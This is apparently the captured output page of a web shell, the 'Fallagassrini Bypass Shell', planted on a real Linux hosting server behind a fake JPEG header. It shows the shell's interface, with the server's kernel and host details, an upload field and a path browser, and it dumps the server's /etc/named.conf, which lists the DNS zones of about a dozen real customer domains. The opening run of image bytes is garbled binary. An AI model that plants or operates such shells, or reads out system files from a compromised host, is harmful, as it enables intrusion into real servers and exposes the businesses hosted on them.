JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /etc/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : //etc/named.conf

options {
    /* make named use port 53 for the source of all queries, to allow
         * firewalls to block all ports except 53:
         */

    // query-source    port 53;
    
    recursion no;

    /* We no longer enable this by default as the dns posion exploit
        has forced many providers to open up their firewalls a bit */

    // Put files that named is allowed to write in the data/ directory:
    directory                "/var/named"; // the default
    pid-file                 "/var/run/named/named.pid";
    dump-file                "data/cache_dump.db";
    statistics-file          "data/named_stats.txt";
   /* memstatistics-file     "data/named_mem_stats.txt"; */
    allow-transfer    { "none"; };
};

logging {
        channel default_log {
                file "/var/log/named/named.log" versions 5 size 128M;
                print-time yes;
                print-severity yes;
                print-category yes;
                severity warning;
        };
        category default { default_log; };
        category general { default_log; };
};

// All BIND 9 zones are in a "view", which allow different zones to be served
// to different types of client addresses, and for options to be set for groups
// of zones.
//
// By default, if named.conf contains no "view" clauses, all zones are in the
// "default" view, which matches all clients.
//
// If named.conf contains any "view" clause, then all zones MUST be in a view;
// so it is recommended to start off using views to avoid having to restructure
// your configuration files in the future.

view "localhost_resolver" {
/* This view sets up named to be a localhost resolver ( caching only nameserver ).
 * If all you want is a caching-only nameserver, then you need only define this view:
 */
    match-clients         { 127.0.0.0/24; };
    match-destinations    { localhost; };
    recursion yes;

    zone "." IN {
        type hint;
        file "/var/named/named.ca";
    };

    /* these are zones that contain definitions for all the localhost
     * names and addresses, as recommended in RFC1912 - these names should
     * ONLY be served to localhost clients:
     */
    include "/var/named/named.rfc1912.zones";
};

view "internal" {
/* This view will contain zones you want to serve only to "internal" clients
   that connect via your directly attached LAN interfaces - "localnets" .
 */
    match-clients        { localnets; };
    match-destinations    { localnets; };
    recursion yes;

    zone "." IN {
        type hint;
        file "/var/named/named.ca";
    };

    // include "/var/named/named.rfc1912.zones";
    // you should not serve your rfc1912 names to non-localhost clients.

    // These are your "authoritative" internal zones, and would probably
    // also be included in the "localhost_resolver" view above :

zone "devazo.co.in" {
	type master;
	file "/var/named/devazo.co.in.db";
};




zone "touchscreenkiosk.co.in" {
	type master;
	file "/var/named/touchscreenkiosk.co.in.db";
};


zone "scsenggtech.com" {
	type master;
	file "/var/named/scsenggtech.com.db";
};




zone "sbrmep.com" {
	type master;
	file "/var/named/sbrmep.com.db";
};




zone "tasca.in" {
	type master;
	file "/var/named/tasca.in.db";
};


zone "kcmfoods.com" {
	type master;
	file "/var/named/kcmfoods.com.db";
};


zone "accelencesolutions.com" {
	type master;
	file "/var/named/accelencesolutions.com.db";
};


zone "easwarilibrary.in" {
	type master;
	file "/var/named/easwarilibrary.in.db";
};


zone "starlabelss.com" {
	type master;
	file "/var/named/starlabelss.com.db";
};


zone "blueskyindustries.in" {
	type master;
	file "/var/named/blueskyindustries.in.db";
};


zone "h2ohealing.in" {
	type master;
	file "/var/named/h2ohealing.in.db";
};


zone "swiftsupportservices.in" {
	type master;
	file "/var/named/swiftsupportservices.in.db";
};


zone "easwarilibrary.live" {
	type master;
	file "/var/named/easwarilibrary.live.db";
};

};

view    "external" {
/* This view will contain zones you want to serve only to "external" clients
 * that have addresses that are not on your directly attached LAN interface subnets:
 */
    recursion no;
    additional-from-cache no;
    // you'd probably want to deny recursion to external clients, so you don't
    // end up providing free DNS service to all takers

    // all views must contain the root hints zone:
    zone "." IN {
        type hint;
        file "/var/named/named.ca";
    };

    // These are your "authoritative" external zones, and would probably
    // contain entries for just your web and mail servers:

    // BEGIN external zone entries


zone "devazo.co.in" {
	type master;
	file "/var/named/devazo.co.in.db";
};




zone "touchscreenkiosk.co.in" {
	type master;
	file "/var/named/touchscreenkiosk.co.in.db";
};


zone "scsenggtech.com" {
	type master;
	file "/var/named/scsenggtech.com.db";
};




zone "sbrmep.com" {
	type master;
	file "/var/named/sbrmep.com.db";
};




zone "tasca.in" {
	type master;
	file "/var/named/tasca.in.db";
};


zone "kcmfoods.com" {
	type master;
	file "/var/named/kcmfoods.com.db";
};


zone "accelencesolutions.com" {
	type master;
	file "/var/named/accelencesolutions.com.db";
};


zone "easwarilibrary.in" {
	type master;
	file "/var/named/easwarilibrary.in.db";
};


zone "starlabelss.com" {
	type master;
	file "/var/named/starlabelss.com.db";
};


zone "blueskyindustries.in" {
	type master;
	file "/var/named/blueskyindustries.in.db";
};


zone "h2ohealing.in" {
	type master;
	file "/var/named/h2ohealing.in.db";
};


zone "swiftsupportservices.in" {
	type master;
	file "/var/named/swiftsupportservices.in.db";
};


zone "easwarilibrary.live" {
	type master;
	file "/var/named/easwarilibrary.live.db";
};

};

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net